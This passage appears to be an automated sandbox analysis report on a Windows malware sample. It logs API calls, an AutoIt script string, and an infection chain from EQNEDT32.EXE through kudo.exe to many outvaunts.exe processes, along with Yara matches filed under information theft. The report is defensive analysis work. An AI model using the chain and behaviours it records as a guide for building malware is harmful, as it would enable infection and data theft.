              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 22_2_0093E32E mov eax, dword ptr fs:[00000030h]22_2_0093E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 22_2_0093F9C0 mov eax, dword ptr fs:[00000030h]22_2_0093F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 22_2_0093E340 mov eax, dword ptr fs:[00000030h]22_2_0093E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 23_2_0091F6D8 mov eax, dword ptr fs:[00000030h]23_2_0091F6D8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 23_2_0091F678 mov eax, dword ptr fs:[00000030h]23_2_0091F678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 23_2_0091DFF8 mov eax, dword ptr fs:[00000030h]23_2_0091DFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 23_2_0091DFE6 mov eax, dword ptr fs:[00000030h]23_2_0091DFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 24_2_0076F9C0 mov eax, dword ptr fs:[00000030h]24_2_0076F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 24_2_0076E340 mov eax, dword ptr fs:[00000030h]24_2_0076E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 24_2_0076FA20 mov eax, dword ptr fs:[00000030h]24_2_0076FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 24_2_0076E32E mov eax, dword ptr fs:[00000030h]24_2_0076E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 25_2_0086F6D8 mov eax, dword ptr fs:[00000030h]25_2_0086F6D8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 25_2_0086DFE6 mov eax, dword ptr fs:[00000030h]25_2_0086DFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 25_2_0086F678 mov eax, dword ptr fs:[00000030h]25_2_0086F678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 25_2_0086DFF8 mov eax, dword ptr fs:[00000030h]25_2_0086DFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 26_2_0088E32E mov eax, dword ptr fs:[00000030h]26_2_0088E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 26_2_0088FA20 mov eax, dword ptr fs:[00000030h]26_2_0088FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 26_2_0088F9C0 mov eax, dword ptr fs:[00000030h]26_2_0088F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 26_2_0088E340 mov eax, dword ptr fs:[00000030h]26_2_0088E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 27_2_00AEDFE6 mov eax, dword ptr fs:[00000030h]27_2_00AEDFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 27_2_00AEF678 mov eax, dword ptr fs:[00000030h]27_2_00AEF678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 27_2_00AEDFF8 mov eax, dword ptr fs:[00000030h]27_2_00AEDFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 27_2_00AEF6D8 mov eax, dword ptr fs:[00000030h]27_2_00AEF6D8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 28_2_0068F9C0 mov eax, dword ptr fs:[00000030h]28_2_0068F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 28_2_0068E340 mov eax, dword ptr fs:[00000030h]28_2_0068E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 28_2_0068E32E mov eax, dword ptr fs:[00000030h]28_2_0068E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 28_2_0068FA20 mov eax, dword ptr fs:[00000030h]28_2_0068FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 29_2_00A7DFE6 mov eax, dword ptr fs:[00000030h]29_2_00A7DFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 29_2_00A7F678 mov eax, dword ptr fs:[00000030h]29_2_00A7F678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 29_2_00A7DFF8 mov eax, dword ptr fs:[00000030h]29_2_00A7DFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 29_2_00A7F6D8 mov eax, dword ptr fs:[00000030h]29_2_00A7F6D8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 30_2_0096FA20 mov eax, dword ptr fs:[00000030h]30_2_0096FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 30_2_0096E32E mov eax, dword ptr fs:[00000030h]30_2_0096E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 30_2_0096F9C0 mov eax, dword ptr fs:[00000030h]30_2_0096F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 30_2_0096E340 mov eax, dword ptr fs:[00000030h]30_2_0096E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 31_2_0076F678 mov eax, dword ptr fs:[00000030h]31_2_0076F678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 31_2_0076DFF8 mov eax, dword ptr fs:[00000030h]31_2_0076DFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 31_2_0076DFE6 mov eax, dword ptr fs:[00000030h]31_2_0076DFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 31_2_0076F6D8 mov eax, dword ptr fs:[00000030h]31_2_0076F6D8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 32_2_006BDFE6 mov eax, dword ptr fs:[00000030h]32_2_006BDFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 32_2_006BF678 mov eax, dword ptr fs:[00000030h]32_2_006BF678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 32_2_006BDFF8 mov eax, dword ptr fs:[00000030h]32_2_006BDFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 32_2_006BF6D8 mov eax, dword ptr fs:[00000030h]32_2_006BF6D8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 33_2_00BBE32E mov eax, dword ptr fs:[00000030h]33_2_00BBE32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 33_2_00BBFA20 mov eax, dword ptr fs:[00000030h]33_2_00BBFA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 33_2_00BBF9C0 mov eax, dword ptr fs:[00000030h]33_2_00BBF9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 33_2_00BBE340 mov eax, dword ptr fs:[00000030h]33_2_00BBE340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 34_2_006CDFE6 mov eax, dword ptr fs:[00000030h]34_2_006CDFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 34_2_006CF678 mov eax, dword ptr fs:[00000030h]34_2_006CF678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 34_2_006CDFF8 mov eax, dword ptr fs:[00000030h]34_2_006CDFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 34_2_006CF6D8 mov eax, dword ptr fs:[00000030h]34_2_006CF6D8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 35_2_00AEE32E mov eax, dword ptr fs:[00000030h]35_2_00AEE32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 35_2_00AEFA20 mov eax, dword ptr fs:[00000030h]35_2_00AEFA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 35_2_00AEF9C0 mov eax, dword ptr fs:[00000030h]35_2_00AEF9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 35_2_00AEE340 mov eax, dword ptr fs:[00000030h]35_2_00AEE340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 36_2_0096FA20 mov eax, dword ptr fs:[00000030h]36_2_0096FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 36_2_0096E32E mov eax, dword ptr fs:[00000030h]36_2_0096E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 36_2_0096F9C0 mov eax, dword ptr fs:[00000030h]36_2_0096F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 36_2_0096E340 mov eax, dword ptr fs:[00000030h]36_2_0096E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 37_2_007BF678 mov eax, dword ptr fs:[00000030h]37_2_007BF678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 37_2_007BDFF8 mov eax, dword ptr fs:[00000030h]37_2_007BDFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 37_2_007BDFE6 mov eax, dword ptr fs:[00000030h]37_2_007BDFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 37_2_007BF6D8 mov eax, dword ptr fs:[00000030h]37_2_007BF6D8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 38_2_0082FA20 mov eax, dword ptr fs:[00000030h]38_2_0082FA20
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 38_2_0082E32E mov eax, dword ptr fs:[00000030h]38_2_0082E32E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 38_2_0082F9C0 mov eax, dword ptr fs:[00000030h]38_2_0082F9C0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 38_2_0082E340 mov eax, dword ptr fs:[00000030h]38_2_0082E340
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 39_2_0079F678 mov eax, dword ptr fs:[00000030h]39_2_0079F678
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 39_2_0079DFF8 mov eax, dword ptr fs:[00000030h]39_2_0079DFF8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 39_2_0079DFE6 mov eax, dword ptr fs:[00000030h]39_2_0079DFE6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 39_2_0079F6D8 mov eax, dword ptr fs:[00000030h]39_2_0079F6D8
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008580A9 GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,5_2_008580A9
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0082A124 SetUnhandledExceptionFilter,5_2_0082A124
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0082A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0082A155
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_0138A124 SetUnhandledExceptionFilter,6_2_0138A124
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_0138A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0138A155
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008587B1 LogonUserW,5_2_008587B1
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00803B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00803B3A
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_008048D7
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00864C27 mouse_event,5_2_00864C27
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\kudo.exe "C:\Users\user\AppData\Local\Temp\kudo.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\Temp\kudo.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00857CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00857CAF
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0085874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_0085874B
              Source: kudo.exe, 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp, outvaunts.exe, 00000006.00000002.461070341.0000000001414000.00000040.00000001.01000000.00000006.sdmp, outvaunts.exe, 00000007.00000002.462634381.0000000001414000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: kudo.exe, outvaunts.exeBinary or memory string: Shell_TrayWnd
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0082862B cpuid 5_2_0082862B
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00834E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00834E87
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00841E06 GetUserNameW,5_2_00841E06
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00833F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_00833F3A
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_008049A0
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              Source: Yara match File source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPE
              Source: Yara match File source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
